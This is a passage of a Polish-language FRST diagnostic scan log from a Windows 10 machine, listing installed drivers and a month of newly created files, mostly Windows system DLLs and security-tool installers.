R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-04-24] (Malwarebytes)
R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251832 2017-04-24] (Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [92096 2017-04-24] (Malwarebytes)
R3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [484576 2016-11-18] (McAfee, Inc.)
R3 mfeavfk; C:\WINDOWS\System32\drivers\mfeavfk.sys [366320 2016-11-18] (McAfee, Inc.)
S0 mfeelamk; C:\WINDOWS\System32\drivers\mfeelamk.sys [85048 2016-11-18] (McAfee, Inc.)
R3 mfefirek; C:\WINDOWS\System32\drivers\mfefirek.sys [518184 2016-11-18] (McAfee, Inc.)
R0 mfehidk; C:\WINDOWS\System32\drivers\mfehidk.sys [916432 2016-11-18] (McAfee, Inc.)
R3 mfencbdc; C:\WINDOWS\System32\DRIVERS\mfencbdc.sys [498152 2016-10-24] (McAfee, Inc.)
S3 mfencrk; C:\WINDOWS\System32\DRIVERS\mfencrk.sys [109336 2016-10-24] (McAfee, Inc.)
R3 mfeplk; C:\WINDOWS\System32\drivers\mfeplk.sys [110248 2016-11-18] (McAfee, Inc.)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [46240 2016-06-06] (McAfee, Inc.)
R0 mfewfpk; C:\WINDOWS\System32\drivers\mfewfpk.sys [254800 2016-11-18] (McAfee, Inc.)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvacwu.inf_amd64_bdd6ea477d4e2fba\nvlddmkm.sys [14190520 2017-01-17] (NVIDIA Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [28216 2016-06-15] (NVIDIA Corporation)
S3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [56384 2016-04-14] (NVIDIA Corporation)
R3 Qcamain10x64; C:\WINDOWS\System32\drivers\Qcamain10x64.sys [2336768 2016-07-16] (Qualcomm Atheros, Inc.)
R3 RadioShim; C:\WINDOWS\System32\drivers\RadioShim.sys [14752 2016-03-11] (Acer Incorporated)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [886528 2015-05-29] (Realtek                                            )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [410880 2015-07-03] (Realsil Semiconductor Corporation)
R0 sptd2; C:\WINDOWS\System32\Drivers\sptd2.sys [203296 2017-04-19] (Duplex Secure Ltd)
R3 SynRMIHID; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [47784 2015-07-29] (Synaptics Incorporated)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)

==================== NetSvcs (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)


==================== Jeden miesiąc - utworzone pliki i foldery ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)

2017-04-24 13:43 - 2017-04-24 13:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2017-04-24 12:58 - 2017-04-24 12:58 - 00000000 ____D C:\Users\Emil\AppData\Local\Macromedia
2017-04-22 13:03 - 2017-04-22 13:08 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-04-22 12:11 - 2017-04-22 12:11 - 00000000 ____D C:\Users\Emil\AppData\Local\Google
2017-04-20 21:36 - 2017-04-20 21:36 - 00000000 ____D C:\Users\Emil\AppData\Local\NetworkTiles
2017-04-20 21:35 - 2017-04-22 12:46 - 00000000 ____D C:\AdwCleaner
2017-04-20 21:34 - 2017-04-20 21:35 - 04089296 _____ C:\Users\Emil\Downloads\AdwCleaner.exe
2017-04-20 21:33 - 2017-04-24 13:38 - 00007546 _____ C:\Users\Emil\Downloads\Fixlog.txt
2017-04-20 21:33 - 2017-04-23 16:05 - 00000000 ____D C:\Users\Emil\Downloads\FRST-OlderVersion
2017-04-20 18:40 - 2017-04-20 18:40 - 00000000 ____D C:\Users\Emil\AppData\Local\Publishers
2017-04-20 12:52 - 2017-04-22 12:51 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-04-19 20:02 - 2017-04-19 20:02 - 00199301 _____ C:\Users\Emil\Desktop\lllooog.txt
2017-04-19 19:49 - 2017-04-22 13:17 - 00049136 _____ C:\Users\Emil\Downloads\Shortcut.txt
2017-04-19 19:45 - 2017-04-22 13:17 - 00045477 _____ C:\Users\Emil\Downloads\Addition.txt
2017-04-19 19:42 - 2017-04-24 13:42 - 00025518 _____ C:\Users\Emil\Downloads\FRST.txt
2017-04-19 19:41 - 2017-04-24 13:42 - 00000000 ____D C:\FRST
2017-04-19 19:40 - 2017-04-23 16:05 - 02426368 _____ (Farbar) C:\Users\Emil\Downloads\FRST64.exe
2017-04-19 19:34 - 2017-04-19 19:37 - 00380928 _____ C:\Users\Emil\Downloads\5ymv7ohx.exe
2017-04-19 19:03 - 2017-04-19 19:03 - 00203296 _____ (Duplex Secure Ltd) C:\WINDOWS\system32\Drivers\sptd2.sys
2017-04-19 19:02 - 2017-04-19 19:03 - 00360696 _____ (Duplex Secure Ltd) C:\Users\Emil\Downloads\SPTD2inst-v212-x64.exe
2017-04-19 18:44 - 2017-04-24 13:41 - 00000000 ____D C:\Users\Emil\AppData\LocalLow\Mozilla
2017-04-19 18:43 - 2017-04-19 18:43 - 00000000 ____D C:\Users\Emil\PicStream
2017-04-19 18:39 - 2017-04-24 12:25 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-04-19 18:34 - 2017-04-20 20:20 - 00186304 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-04-19 18:33 - 2017-04-24 13:40 - 00111544 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-04-19 18:33 - 2017-04-24 13:40 - 00092096 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-04-19 18:33 - 2017-04-24 13:40 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-04-19 18:33 - 2017-04-24 13:39 - 00251832 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-04-19 18:33 - 2017-04-20 20:20 - 00077440 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-04-19 18:33 - 2017-04-19 18:33 - 00001916 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-04-19 18:33 - 2017-04-19 18:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-04-19 18:33 - 2017-04-19 18:33 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-04-19 18:33 - 2017-04-19 18:33 - 00000000 ____D C:\Program Files\Malwarebytes
2017-04-19 18:29 - 2017-04-19 18:32 - 55566792 _____ (Malwarebytes ) C:\Users\Emil\Downloads\mb3-setup-consumer-3.0.6.1469.exe
2017-04-17 15:31 - 2017-04-22 12:46 - 00000000 ____D C:\WINDOWS\system32\log
2017-04-17 15:28 - 2017-04-21 14:57 - 00034328 _____ (Sysinternals - www.sysinternals.com) C:\WINDOWS\system32\Drivers\PROCEXP152.SYS
2017-04-14 19:36 - 2017-04-14 19:37 - 84719580 _____ C:\Users\Emil\Downloads\1_the_flying_farm.apk
2017-04-13 13:20 - 2017-04-13 13:20 - 00001260 _____ C:\Users\Emil\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ustawienia aktualizacji i prywatności.lnk
2017-04-13 13:20 - 2017-04-13 13:20 - 00000000 ____D C:\Users\Emil\AppData\Local\UNP
2017-04-13 12:51 - 2017-04-13 12:52 - 00000000 ____D C:\Program Files\UNP
2017-04-13 12:51 - 2017-04-13 12:51 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-04-12 11:20 - 2017-03-28 07:41 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\odbcconf.dll
2017-04-12 11:20 - 2017-03-28 07:40 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XblAuthManagerProxy.dll
2017-04-12 11:20 - 2017-03-28 07:38 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XblAuthTokenBrokerExt.dll
2017-04-12 11:20 - 2017-03-28 07:36 - 00769024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ipsecsnp.dll
2017-04-12 11:20 - 2017-03-28 07:35 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2017-04-12 11:20 - 2017-03-28 07:34 - 00117760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2017-04-12 11:20 - 2017-03-28 07:33 - 00436736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ipsmsnap.dll
2017-04-12 11:20 - 2017-03-28 07:32 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepsync.dll
2017-04-12 11:20 - 2017-03-28 07:32 - 00206336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vaultcli.dll
2017-04-12 11:20 - 2017-03-28 07:32 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepapi.dll
2017-04-12 11:20 - 2017-03-28 07:29 - 00238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-04-12 11:20 - 2017-03-28 07:17 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll
2017-04-12 11:20 - 2017-03-28 07:14 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Geolocation.dll
2017-04-12 11:19 - 2017-03-28 09:10 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-04-12 11:19 - 2017-03-28 09:10 - 00315744 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-04-12 11:19 - 2017-03-28 08:21 - 00167848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscapi.dll
2017-04-12 11:19 - 2017-03-28 08:19 - 00601712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-04-12 11:19 - 2017-03-28 08:15 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-04-12 11:19 - 2017-03-28 08:04 - 00861024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-04-12 11:19 - 2017-03-28 08:04 - 00277344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-04-12 11:19 - 2017-03-28 08:04 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-04-12 11:19 - 2017-03-28 08:04 - 00116568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-04-12 11:19 - 2017-03-28 08:02 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2017-04-12 11:19 - 2017-03-28 08:02 - 00576408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-04-12 11:19 - 2017-03-28 07:58 - 01360464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2017-04-12 11:19 - 2017-03-28 07:58 - 00981888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2017-04-12 11:19 - 2017-03-28 07:53 - 01414728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-04-12 11:19 - 2017-03-28 07:53 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-04-12 11:19 - 2017-03-28 07:52 - 00306800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2017-04-12 11:19 - 2017-03-28 07:42 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-04-12 11:19 - 2017-03-28 07:42 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usoapi.dll
2017-04-12 11:19 - 2017-03-28 07:40 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2017-04-12 11:19 - 2017-03-28 07:40 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-04-12 11:19 - 2017-03-28 07:39 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Radios.dll
2017-04-12 11:19 - 2017-03-28 07:39 - 00040960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll
2017-04-12 11:19 - 2017-03-28 07:38 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDeviceRegistration.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\unimdm.tsp
2017-04-12 11:19 - 2017-03-28 07:37 - 00215552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apds.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.HostName.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00097792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.SystemManagement.dll
2017-04-12 11:19 - 2017-03-28 07:37 - 00041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-04-12 11:19 - 2017-03-28 07:36 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinRtTracing.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SerialCommunication.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.UserDeviceAssociation.dll
2017-04-12 11:19 - 2017-03-28 07:36 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicDisplay.sys
2017-04-12 11:19 - 2017-03-28 07:35 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-04-12 11:19 - 2017-03-28 07:35 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.LowLevel.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-04-12 11:19 - 2017-03-28 07:35 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll
2017-04-12 11:19 - 2017-03-28 07:35 - 00113152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Lights.dll
2017-04-12 11:19 - 2017-03-28 07:34 - 00299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2017-04-12 11:19 - 2017-03-28 07:34 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
2017-04-12 11:19 - 2017-03-28 07:34 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Core.dll
2017-04-12 11:19 - 2017-03-28 07:33 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Import.dll
2017-04-12 11:19 - 2017-03-28 07:33 - 00265728 _____ C:\WINDOWS\SysWOW64\Windows.Perception.Stub.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 01243136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.FaceAnalysis.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SmartCards.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00271360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-04-12 11:19 - 2017-03-28 07:32 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WwaApi.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00202752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.HumanInterfaceDevice.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2017-04-12 11:19 - 2017-03-28 07:32 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2017-04-12 11:19 - 2017-03-28 07:31 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-04-12 11:19 - 2017-03-28 07:31 - 00498688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mbsmsapi.dll
2017-04-12 11:19 - 2017-03-28 07:31 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2017-04-12 11:19 - 2017-03-28 07:31 - 00390656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NaturalLanguage6.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00787968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sbe.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Picker.dll
2017-04-12 11:19 - 2017-03-28 07:30 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2017-04-12 11:19 - 2017-03-28 07:29 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Ocr.dll
2017-04-12 11:19 - 2017-03-28 07:29 - 00529920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StructuredQuery.dll
2017-04-12 11:19 - 2017-03-28 07:29 - 00314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Usb.dll
2017-04-12 11:19 - 2017-03-28 07:29 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-04-12 11:19 - 2017-03-28 07:28 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-04-12 11:19 - 2017-03-28 07:28 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2017-04-12 11:19 - 2017-03-28 07:28 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll
2017-04-12 11:19 - 2017-03-28 07:27 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CryptoWinRT.dll
2017-04-12 11:19 - 2017-03-28 07:26 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.InkControls.dll
2017-04-12 11:19 - 2017-03-28 07:26 - 00313856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2017-04-12 11:19 - 2017-03-28 07:25 - 02333184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WsmSvc.dll
2017-04-12 11:19 - 2017-03-28 07:25 - 01196544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2017-04-12 11:19 - 2017-03-28 07:24 - 00675840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll
2017-04-12 11:19 - 2017-03-28 07:23 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll
2017-04-12 11:19 - 2017-03-28 07:23 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2017-04-12 11:19 - 2017-03-28 07:22 - 00516096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcli.dll
2017-04-12 11:19 - 2017-03-28 07:22 - 00355328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTMediaFrame.dll
2017-04-12 11:19 - 2017-03-28 07:22 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\enrollmentapi.dll
2017-04-12 11:19 - 2017-03-28 07:21 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll
2017-04-12 11:19 - 2017-03-28 07:20 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-04-12 11:19 - 2017-03-28 07:20 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll
2017-04-12 11:19 - 2017-03-28 07:20 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00746496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msdtcprx.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dlnashext.dll
2017-04-12 11:19 - 2017-03-28 07:19 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dialclient.dll
2017-04-12 11:19 - 2017-03-28 07:17 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Streaming.dll
2017-04-12 11:19 - 2017-03-28 07:17 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-04-12 11:19 - 2017-03-28 07:16 - 01221120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2017-04-12 11:19 - 2017-03-28 07:16 - 00134144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ErrorDetails.dll
2017-04-12 11:19 - 2017-03-28 07:15 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2017-04-12 11:19 - 2017-03-28 07:14 - 00641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2017-04-12 11:19 - 2017-03-28 07:14 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-04-12 11:19 - 2017-03-28 07:13 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-04-12 11:19 - 2017-03-28 07:13 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00654336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApiPublic.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00542208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Connectivity.dll
2017-04-12 11:19 - 2017-03-28 07:12 - 00348160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Midi.dll
2017-04-12 11:19 - 2017-03-28 07:11 - 02994176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-04-12 11:19 - 2017-03-28 07:11 - 02646528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-04-12 11:19 - 2017-03-28 07:11 - 01576448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2017-04-12 11:19 - 2017-03-28 07:11 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll
2017-04-12 11:19 - 2017-03-28 07:11 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll
2017-04-12 11:19 - 2017-03-28 07:10 - 02483200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-04-12 11:19 - 2017-03-28 07:08 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2017-04-12 11:19 - 2017-03-28 07:08 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RADCUI.dll
2017-04-12 11:19 - 2017-03-28 06:48 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-04-12 11:19 - 2017-03-16 06:38 - 00034088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CompPkgSup.dll
2017-04-12 11:18 - 2017-03-28 08:07 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2017-04-12 11:18 - 2017-03-28 08:05 - 01504056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-04-12 11:18 - 2017-03-28 08:04 - 05721808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-04-12 11:18 - 2017-03-28 08:04 - 02262776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-04-12 11:18 - 2017-03-28 08:04 - 01431232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-04-12 11:18 - 2017-03-28 08:04 - 00975744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2017-04-12 11:18 - 2017-03-28 08:02 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2017-04-12 11:18 - 2017-03-28 07:59 - 06667520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-04-12 11:18 - 2017-03-28 07:59 - 04023008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 20967840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 01851688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 01344448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
